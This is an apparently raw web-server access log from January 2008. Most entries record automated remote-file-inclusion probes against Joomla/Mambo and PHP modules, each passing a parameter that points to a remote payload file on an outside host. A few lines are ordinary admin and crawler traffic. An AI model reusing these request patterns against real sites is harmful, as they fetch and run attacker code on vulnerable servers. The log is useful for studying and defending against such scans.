68.8.232.250 - warboard [25/Jan/2008:08:50:16 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=582&just_updated=1 HTTP/1.1" 200 7648 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=582" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [25/Jan/2008:08:50:25 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=582&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [25/Jan/2008:08:50:27 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [25/Jan/2008:08:50:29 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33157 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
74.6.23.216 - - [25/Jan/2008:08:51:35 -0800] "GET /tmp/sess_3ce97a9dfc16ecda61af5fbf84478408 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.150.32.163 - - [25/Jan/2008:08:53:09 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.150.32.163 - - [25/Jan/2008:08:53:12 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.150.32.163 - - [25/Jan/2008:08:53:15 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:08:53:24 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:08:53:24 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:08:53:25 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:08:53:36 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:08:53:36 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:08:53:37 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:54:12 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:54:12 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:54:13 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:08:54:39 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:08:54:48 -0800] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:08:54:48 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:08:54:48 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.99.194.216 - - [25/Jan/2008:08:56:22 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://66.206.168.162:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
208.99.194.216 - - [25/Jan/2008:08:56:22 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://66.206.168.162:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:08:56:24 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:08:56:33 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:56:57 -0800] "GET /logs/access_080101.log/%22Webcalendar%22http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:56:58 -0800] "GET /%22Webcalendar%22http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:56:58 -0800] "GET /logs/%22Webcalendar%22http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:08:59:06 -0800] "GET /logs/access_071231.log/%22Webcalendar%22http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:08:59:45 -0800] "GET /logs/access_071121.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:09:00:56 -0800] "GET /logs/access_071230.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:09:00:57 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [25/Jan/2008:09:00:57 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.86.122.66 - - [25/Jan/2008:09:01:15 -0800] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://2eat.com.au/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.122.66 - - [25/Jan/2008:09:01:15 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://2eat.com.au/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.122.66 - - [25/Jan/2008:09:01:16 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://2eat.com.au/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:09:02:36 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:09:02:37 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:09:02:37 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:09:03:59 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:09:03:59 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:09:03:59 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:09:06:18 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:09:06:18 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [25/Jan/2008:09:06:19 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:09:09:26 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_users&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:09:09:39 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.41.212.194 - - [25/Jan/2008:09:10:07 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_galleria&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.124 - - [25/Jan/2008:09:10:57 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.124 - - [25/Jan/2008:09:10:58 -0800] "GET /minamijewelry/bird.psd HTTP/1.0" 200 109644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:09:11:33 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:09:11:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:09:11:34 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:09:12:20 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:09:12:20 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:09:12:20 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.73.102.217 - - [25/Jan/2008:09:13:28 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:09:16:11 -0800] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.165 - - [25/Jan/2008:09:19:06 -0800] "GET /minamijewelry/?N=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.25.34 - - [25/Jan/2008:09:21:28 -0800] "GET /logs/access_071229.log//components/com_minibb.php?absolute_path=http://eagles-tailgate.com/gallery/albums/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.25.34 - - [25/Jan/2008:09:21:28 -0800] "GET //components/com_minibb.php?absolute_path=http://eagles-tailgate.com/gallery/albums/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.25.34 - - [25/Jan/2008:09:21:28 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://eagles-tailgate.com/gallery/albums/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.181.240.100 - - [25/Jan/2008:09:21:58 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:09:23:47 -0800] "GET /logs/access_071202.log/index.php?_REQUEST=&_REQUEST[option]=com_users&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [25/Jan/2008:09:23:47 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_users&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.169.116 - - [25/Jan/2008:09:24:02 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.exploringcolumbia.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.169.116 - - [25/Jan/2008:09:24:02 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.exploringcolumbia.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.169.116 - - [25/Jan/2008:09:24:02 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.exploringcolumbia.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.90 - - [25/Jan/2008:09:24:26 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.205.57.211 - - [25/Jan/2008:09:24:41 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [25/Jan/2008:09:24:42 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [25/Jan/2008:09:24:42 -0800] "GET /logs/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 31683 "-" "libwww-perl/5.79" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:09:26:29 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:09:26:29 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:09:26:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:26:41 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:26:41 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:26:42 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:28:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.213.194.42 - - [25/Jan/2008:09:28:53 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.124 - - [25/Jan/2008:09:30:14 -0800] "GET /megumi/Necklace/?S=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.213.194.42 - - [25/Jan/2008:09:30:18 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [25/Jan/2008:09:30:19 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [25/Jan/2008:09:30:19 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [25/Jan/2008:09:31:07 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.helenavondrackova.cz/pages/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.102.217 - - [25/Jan/2008:09:33:14 -0800] "GET /logs/access_080101.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.102.217 - - [25/Jan/2008:09:33:14 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.102.217 - - [25/Jan/2008:09:33:57 -0800] "GET /logs/access_071219.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.240.89 - - [25/Jan/2008:09:37:25 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [25/Jan/2008:09:37:25 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [25/Jan/2008:09:37:25 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [25/Jan/2008:09:41:38 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [25/Jan/2008:09:41:38 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [25/Jan/2008:09:41:38 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [25/Jan/2008:09:41:43 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [25/Jan/2008:09:41:43 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [25/Jan/2008:09:41:44 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:42:28 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:09:42:28 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.41.212.194 - - [25/Jan/2008:09:42:45 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_galleria&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.41.212.194 - - [25/Jan/2008:09:42:45 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_galleria&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.merlions.se/pages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.181.240.100 - - [25/Jan/2008:09:43:01 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.181.240.100 - - [25/Jan/2008:09:43:01 -0800] "GET /?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
66.181.240.100 - - [25/Jan/2008:09:43:02 -0800] "GET /logs/?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 200 32337 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:09:43:38 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:09:43:38 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:09:43:38 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:09:44:10 -0800] "GET /logs/access_071230.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:09:44:13 -0800] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
